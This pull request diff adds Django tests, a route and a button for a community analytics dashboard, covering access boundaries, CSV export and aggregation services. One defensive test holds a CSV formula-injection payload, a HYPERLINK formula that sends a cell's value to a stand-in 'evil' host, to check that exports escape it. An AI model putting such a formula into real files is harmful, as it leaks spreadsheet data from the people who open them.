+def _make_analytics(community, *, page_path, content_type, object_id, date_, pv, source='google / organic'):
+    PageAnalytics.objects.create(
+        community=community,
+        page_path=page_path,
+        date=date_,
+        source_medium=source,
+        pv=pv,
+        users=pv,
+        sessions=pv,
+        content_type=content_type,
+        object_id=object_id,
+    )
+
+
+class DashboardViewAccessTest(TestCase):
+    """ダッシュボードの権限境界を検証。"""
+
+    def setUp(self):
+        self.client = Client()
+        self.community_a = _create_community('A')
+        self.community_b = _create_community('B')
+        self.user_a = CustomUser.objects.create_user(
+            user_name='user_a', email='a@example.com', password='pass'
+        )
+        CommunityMember.objects.create(
+            community=self.community_a,
+            user=self.user_a,
+            role=CommunityMember.Role.OWNER,
+        )
+        self.user_b = CustomUser.objects.create_user(
+            user_name='user_b', email='b@example.com', password='pass'
+        )
+        CommunityMember.objects.create(
+            community=self.community_b,
+            user=self.user_b,
+            role=CommunityMember.Role.OWNER,
+        )
+        self.url = reverse('analytics:dashboard')
+
+        # A の records には source-A-only / B には source-B-only を入れて、識別可能にする
+        ed_a = _create_event_detail(self.community_a, 'A theme')
+        ed_b = _create_event_detail(self.community_b, 'B theme')
+        today = timezone.localdate()
+        _make_analytics(self.community_a, page_path='/community/{}/'.format(self.community_a.id),
+                        content_type=PageAnalytics.ContentType.COMMUNITY,
+                        object_id=self.community_a.id, date_=today, pv=10, source='source-A-only / organic')
+        _make_analytics(self.community_a, page_path='/event/detail/{}/'.format(ed_a.id),
+                        content_type=PageAnalytics.ContentType.EVENT_DETAIL,
+                        object_id=ed_a.id, date_=today, pv=5, source='source-A-only / referral')
+        _make_analytics(self.community_b, page_path='/community/{}/'.format(self.community_b.id),
+                        content_type=PageAnalytics.ContentType.COMMUNITY,
+                        object_id=self.community_b.id, date_=today, pv=20, source='source-B-only / organic')
+
+    def test_unauthenticated_redirects_to_login(self):
+        response = self.client.get(self.url)
+        self.assertEqual(response.status_code, 302)
+        self.assertIn('/account/login/', response['Location'])
+
+    def test_member_sees_only_own_community_data(self):
+        """user_a は community_a のデータのみ見え、community_b の流入元は見えない。"""
+        self.client.force_login(self.user_a)
+        response = self.client.get(self.url)
+        self.assertEqual(response.status_code, 200)
+        # context レベルで権限境界を確認（テンプレ描画よりも素直に検証可能）
+        breakdown = response.context['source_breakdown']
+        sources = {row['source_medium'] for row in breakdown}
+        self.assertIn('source-A-only / organic', sources)
+        self.assertNotIn('source-B-only / organic', sources)
+
+    def test_member_cannot_view_other_community_by_query_param(self):
+        """?community=B を指定しても user_a には B のデータが漏れない（IDOR防止）。"""
+        self.client.force_login(self.user_a)
+        response = self.client.get(self.url, {'community': self.community_b.id})
+        self.assertEqual(response.status_code, 200)
+        sources = {row['source_medium'] for row in response.context['source_breakdown']}
+        # 不正な community 指定はアクセス可能な全community(=A) にフォールバック
+        self.assertIn('source-A-only / organic', sources)
+        self.assertNotIn('source-B-only / organic', sources)
+
+    def test_user_without_any_community_sees_empty_state(self):
+        """所属 community がないユーザーは has_access=False となる。"""
+        no_member = CustomUser.objects.create_user(
+            user_name='no_member', email='nm@example.com', password='pass'
+        )
+        self.client.force_login(no_member)
+        response = self.client.get(self.url)
+        self.assertEqual(response.status_code, 200)
+        self.assertFalse(response.context['has_access'])
+
+    def test_superuser_sees_all_communities(self):
+        """superuser は B のデータも見える。"""
+        admin = CustomUser.objects.create_superuser(
+            user_name='admin', email='admin@example.com', password='pass'
+        )
+        self.client.force_login(admin)
+        response = self.client.get(self.url)
+        sources = {row['source_medium'] for row in response.context['source_breakdown']}
+        self.assertIn('source-A-only / organic', sources)
+        self.assertIn('source-B-only / organic', sources)
+
+
+class DashboardPeriodTest(TestCase):
+    """期間切替（?days=7/30/90）を検証。"""
+
+    def setUp(self):
+        self.client = Client()
+        self.community = _create_community('C')
+        self.user = CustomUser.objects.create_user(
+            user_name='u', email='u@example.com', password='pass'
+        )
+        CommunityMember.objects.create(
+            community=self.community, user=self.user, role=CommunityMember.Role.OWNER,
+        )
+        self.client.force_login(self.user)
+
+        today = timezone.localdate()
+        # 5日前と45日前の2件
+        _make_analytics(self.community, page_path='/community/c/',
+                        content_type=PageAnalytics.ContentType.COMMUNITY,
+                        object_id=self.community.id,
+                        date_=today - timedelta(days=5), pv=100, source='recent / direct')
+        _make_analytics(self.community, page_path='/community/c/',
+                        content_type=PageAnalytics.ContentType.COMMUNITY,
+                        object_id=self.community.id,
+                        date_=today - timedelta(days=45), pv=200, source='old / referral')
+
+    def _sources(self, response):
+        return {row['source_medium'] for row in response.context['source_breakdown']}
+
+    def test_days_7_excludes_old_data(self):
+        response = self.client.get(reverse('analytics:dashboard'), {'days': 7})
+        sources = self._sources(response)
+        self.assertIn('recent / direct', sources)
+        self.assertNotIn('old / referral', sources)
+
+    def test_days_90_includes_old_data(self):
+        response = self.client.get(reverse('analytics:dashboard'), {'days': 90})
+        sources = self._sources(response)
+        self.assertIn('recent / direct', sources)
+        self.assertIn('old / referral', sources)
+
+    def test_invalid_days_falls_back_to_default(self):
+        """許可リスト外の days は 30 にフォールバック。"""
+        response = self.client.get(reverse('analytics:dashboard'), {'days': 999})
+        # 30日デフォルト = 5日前は含む、45日前は含まない
+        sources = self._sources(response)
+        self.assertIn('recent / direct', sources)
+        self.assertNotIn('old / referral', sources)
+        self.assertEqual(response.context['days'], 30)
+
+
+class DashboardCsvExportTest(TestCase):
+    """CSV エクスポート機能を検証。"""
+
+    def setUp(self):
+        self.client = Client()
+        self.community = _create_community('D')
+        self.user = CustomUser.objects.create_user(
+            user_name='u', email='u@example.com', password='pass'
+        )
+        CommunityMember.objects.create(
+            community=self.community, user=self.user, role=CommunityMember.Role.OWNER,
+        )
+        self.client.force_login(self.user)
+
+        self.ed = _create_event_detail(self.community, 'CSV テスト記事', event_date=date(2026, 5, 1))
+        today = timezone.localdate()
+        _make_analytics(self.community, page_path=f'/event/detail/{self.ed.id}/',
+                        content_type=PageAnalytics.ContentType.EVENT_DETAIL,
+                        object_id=self.ed.id, date_=today, pv=42, source='google / organic')
+
+    def test_csv_export_returns_csv_content_type(self):
+        response = self.client.get(reverse('analytics:dashboard'), {'format': 'csv'})
+        self.assertEqual(response.status_code, 200)
+        self.assertIn('text/csv', response['Content-Type'])
+        self.assertIn('attachment', response['Content-Disposition'])
+
+    def test_csv_includes_event_detail_row(self):
+        response = self.client.get(reverse('analytics:dashboard'), {'format': 'csv'})
+        # utf-8-sig でデコードすれば BOM が自動除去される（テスト側で BOM 取り扱いを気にしない）
+        content = response.content.decode('utf-8-sig')
+        reader = csv.reader(io.StringIO(content))
+        rows = list(reader)
+        # 1行目: ヘッダー、以降データ
+        self.assertGreater(len(rows), 1)
+        header = rows[0]
+        self.assertIn('タイトル', header)
+        self.assertIn('PV', header)
+        # データ行に記事 ID が含まれる
+        ids = [row[0] for row in rows[1:]]
+        self.assertIn(str(self.ed.id), ids)
+
+    def test_csv_starts_with_utf8_bom(self):
+        """Excel で文字化けしないよう UTF-8 BOM を必ず付ける（回帰防止）。"""
+        response = self.client.get(reverse('analytics:dashboard'), {'format': 'csv'})
+        self.assertTrue(
+            response.content.startswith(b'\xef\xbb\xbf'),
+            'CSV response must start with UTF-8 BOM',
+        )
+
+
+class ServiceFunctionsTest(TestCase):
+    """services.py の集計関数を直接検証。"""
+
+    def setUp(self):
+        self.community = _create_community('E')
+        self.ed = _create_event_detail(self.community, 'Service テスト記事', event_date=date(2026, 5, 1))
+        today = timezone.localdate()
+        # 直近30日: pv 50, 前30日: pv 25 (= 100% 増)
+        _make_analytics(self.community, page_path=f'/event/detail/{self.ed.id}/',
+                        content_type=PageAnalytics.ContentType.EVENT_DETAIL,
+                        object_id=self.ed.id, date_=today - timedelta(days=5), pv=50)
+        _make_analytics(self.community, page_path=f'/event/detail/{self.ed.id}/',
+                        content_type=PageAnalytics.ContentType.EVENT_DETAIL,
+                        object_id=self.ed.id, date_=today - timedelta(days=45), pv=25)
+
+    def test_get_overall_stats_calculates_change_pct(self):
+        stats = services.get_overall_stats([self.community.id], days=30)
+        self.assertEqual(stats['pv'], 50)
+        self.assertEqual(stats['pv_prev'], 25)
+        self.assertEqual(stats['pv_change_pct'], 100.0)
+
+    def test_get_overall_stats_empty_community_returns_zeros(self):
+        stats = services.get_overall_stats([], days=30)
+        self.assertEqual(stats['pv'], 0)
+        self.assertIsNone(stats['pv_change_pct'])
+
+    def test_get_event_detail_breakdown_includes_metadata(self):
+        rows = services.get_event_detail_breakdown([self.community.id], days=30)
+        self.assertEqual(len(rows), 1)
+        row = rows[0]
+        self.assertEqual(row['event_detail_id'], self.ed.id)
+        self.assertEqual(row['theme'], 'Service テスト記事')
+        self.assertEqual(row['community_name'], 'E')
+        self.assertEqual(row['pv'], 50)
+
+    def test_get_event_detail_breakdown_respects_community_boundary(self):
+        """他人の community_id を渡しても自分のデータは返らない。"""
+        other = _create_community('Other')
+        rows = services.get_event_detail_breakdown([other.id], days=30)
+        self.assertEqual(rows, [])
+
+    def test_get_post_publish_series_aligns_by_publish_date(self):
+        """公開日基準で Day 0, 1, ... の PV が並ぶ。"""
+        result = services.get_post_publish_series(
+            [self.community.id], days_after=10, top_n=3,
+        )
+        self.assertEqual(result['labels'][:3], ['Day 0', 'Day 1', 'Day 2'])
+        # 1記事しかないので datasets は1件以下
+        self.assertLessEqual(len(result['datasets']), 1)

--- a/app/analytics/tests/test_dashboard.py
+++ b/app/analytics/tests/test_dashboard.py
@@ -246,6 +246,35 @@ class DashboardCsvExportTest(TestCase):
             'CSV response must start with UTF-8 BOM',
         )
 
+    def test_csv_blocks_other_community_data_by_query_param(self):
+        """?format=csv&community={他人のID} でも自分の community 範囲外のデータは含まれない。"""
+        # 他人の community を作成し event_detail と analytics を仕込む
+        other = _create_community('OtherCommunity')
+        other_ed = _create_event_detail(other, '他人の記事X', event_date=date(2026, 5, 1))
+        _make_analytics(other, page_path=f'/event/detail/{other_ed.id}/',
+                        content_type=PageAnalytics.ContentType.EVENT_DETAIL,
+                        object_id=other_ed.id, date_=timezone.localdate(), pv=999)
+
+        response = self.client.get(
+            reverse('analytics:dashboard'),
+            {'format': 'csv', 'community': other.id},
+        )
+        content = response.content.decode('utf-8-sig')
+        # 他人 community の名前と記事タイトルは CSV に含まれない（IDOR防止）
+        self.assertNotIn('OtherCommunity', content)
+        self.assertNotIn('他人の記事X', content)
+
+    def test_csv_escapes_formula_injection(self):
+        """先頭が =,+,-,@ の文字列はシングルクォートで無害化される。"""
+        # theme を悪意ある式に書き換え
+        self.ed.theme = '=HYPERLINK("http://evil/?leak=" & A1, "click")'
+        self.ed.save()
+
+        response = self.client.get(reverse('analytics:dashboard'), {'format': 'csv'})
+        content = response.content.decode('utf-8-sig')
+        # シングルクォート付きで埋め込まれる（Excel で数式評価されない）
+        self.assertIn("'=HYPERLINK", content)
+
 
 class ServiceFunctionsTest(TestCase):
     """services.py の集計関数を直接検証。"""

--- a/app/analytics/urls.py
+++ b/app/analytics/urls.py
@@ -1,9 +1,11 @@
 from django.urls import path
 
+from .dashboard_views import AnalyticsDashboardView
 from .views import sync_analytics
 
 app_name = 'analytics'
 
 urlpatterns = [
     path('sync/', sync_analytics, name='sync'),
+    path('dashboard/', AnalyticsDashboardView.as_view(), name='dashboard'),
 ]

--- a/app/event/templates/event/my_list.html
+++ b/app/event/templates/event/my_list.html
@@ -70,6 +70,9 @@
                 <i class="fa-solid fa-microphone"></i> 発表申請一覧
             </a>
             {% if community %}
+            <a href="{% url 'analytics:dashboard' %}?community={{ community.id }}" class="btn btn-outline-info">
+                <i class="fas fa-chart-line"></i> アクセス
+            </a>
             <a href="{% url 'event:detail_history' %}?community_name={{ community.name }}" class="btn btn-outline-secondary">
                 <i class="fas fa-history"></i> 発表履歴
             </a>


### PR DESCRIPTION
## なぜこの変更が必要か

PR #370 で GA4 アクセスデータの個別ページ表示（集会詳細・イベント詳細）を実装したが、集会主催者が「自分の集会全体のアクセス傾向」「どの記事が読まれているか」「流入元はどこか」を一画面で見られる手段が無く、運営判断（告知タイミング・トピック選定）の根拠データを横断で確認できなかった。/event/my_list/ にボタンを置き、専用ダッシュボードページへ集約する。

Issue: なし（直接依頼）。関連 Issue #375（Phase 2 #10 #11 を別 PR とした）。

## 変更内容

- **`/analytics/dashboard/` 新規追加**: 集会主催者向けアクセス解析ダッシュボード
- **`/event/my_list/` に「アクセス」ボタン追加**: community owner なら遷移可能
- **services.py に集計関数追加**:
  - `get_overall_stats(community_ids, days)` — PV/UU/セッション合計と前期間比較率
  - `get_event_detail_breakdown(community_ids, days, limit=50)` — 記事別 PV/UU/セッション + 主要流入元
  - `get_post_publish_series(community_ids, days_after, top_n)` — 公開日基準の積み上げ PV 推移
- **CSV エクスポート**: `?format=csv` でダウンロード（Excel 用 UTF-8 BOM + Formula Injection 対策済み）
- **テスト 18 件**: 権限境界 5 / 期間 3 / CSV 4 / サービス関数 5 / 認証 1

## ダッシュボードの機能

| カテゴリ | 機能 |
|---|---|
| 切替 | 集会切替（all / 単一）、期間切替（7/30/90日） |
| サマリー | PV/UU/セッション合計 + 前期間比較率（%、▲▼表示） |
| 推移 | 既存 Chart.js を再利用した日別折れ線グラフ |
| 流入元 | source/medium 別 PV ランキング |
| 記事別 | PV 上位 50 記事のテーブル（記事タイトル / 集会 / 公開日 / PV/UU/セッション / 主要流入元） |
| 比較 | 公開後 N 日積み上げチャート（上位5記事を公開日基準で揃えて重ね描き） |
| 出力 | CSV ダウンロード（全カラム） |

## 意思決定

### 採用アプローチ
- **既存 `accessible_community_ids` を単一ゲートとして継続使用**: 新規 view でも同じ権限境界。`?community=N` で他集会 ID を指定しても accessible 範囲外なら silent fallback
- **CSV BOM は手動付与 + charset=utf-8**: `charset=utf-8-sig` だと Django が encoding 時に追加 BOM を付け二重 BOM になるため
- **`get_post_publish_series` は top_n=5 でループ**: 軽い N+1 だが件数固定なので許容（改善余地あり、将来 1 クエリ化可能）
- **入口は my_list の `{% if community %}` 配下**: 主催する集会がないユーザーには表示しない

### 却下した代替案
- **集会セレクタを Django セッションに保存** → 却下: my_list の active_community とリンクは GET パラメータで十分。session 同期は次回拡張で
- **記事別テーブルにフィルタ入力欄** → 却下: MVP では上位50件で十分。検索/フィルタは利用状況を見てから
- **Phase 2 #10 #11（未紐付け・ポスター流入）** → 別 PR（#375 Issue化）

### トレードオフ
- 公開後N日チャート: 1記事ごとに `_base_queryset` 呼び出し（軽い N+1）> シンプルな実装: top_n=5 で許容
- データ層に Excel 互換 CSV を漏らす責務 > 専用 export エンドポイント分離: BOM 対策のみで足りるため view 内に同居

## レビュー対応

実装後の3並列レビューに基づき以下を反映:

| レビュアー | 指摘 | 対応 |
|---|---|---|
| code-reviewer | CSV Formula Injection 対策 | `_csv_safe()` ヘルパで theme/community_name/top_source をエスケープ |
| security-checker | CSV IDOR テスト追加 | `test_csv_blocks_other_community_data_by_query_param` 追加 |
| security-checker | Formula Injection 対策 | 同上 + 回帰防止テスト追加 |
| design-checker | カードラベル統一 / 高さ固定 / 色分け（Craft C→B） | 期間表記統一、`min-height` 固定、`border-start border-4 border-{primary,success,info}` 適用 |

## テスト

- [x] analytics/tests/test_dashboard.py 新規 18 件すべて OK
- [x] 全 1480 テスト OK（既存テスト回帰なし）
- [x] ローカル QA（nori superuser、community 19 でログイン）: my_list の「アクセス」ボタンから遷移 → 30日表示 → 90日切替 → 集会フィルタ → CSV ダウンロード（添付参照）

## 関連
- 後追い対応: Issue #375（Phase 2 #10 未紐付けトラフィック / #11 ポスター流入）

🤖 Generated with [Claude Code](https://claude.com/claude-code)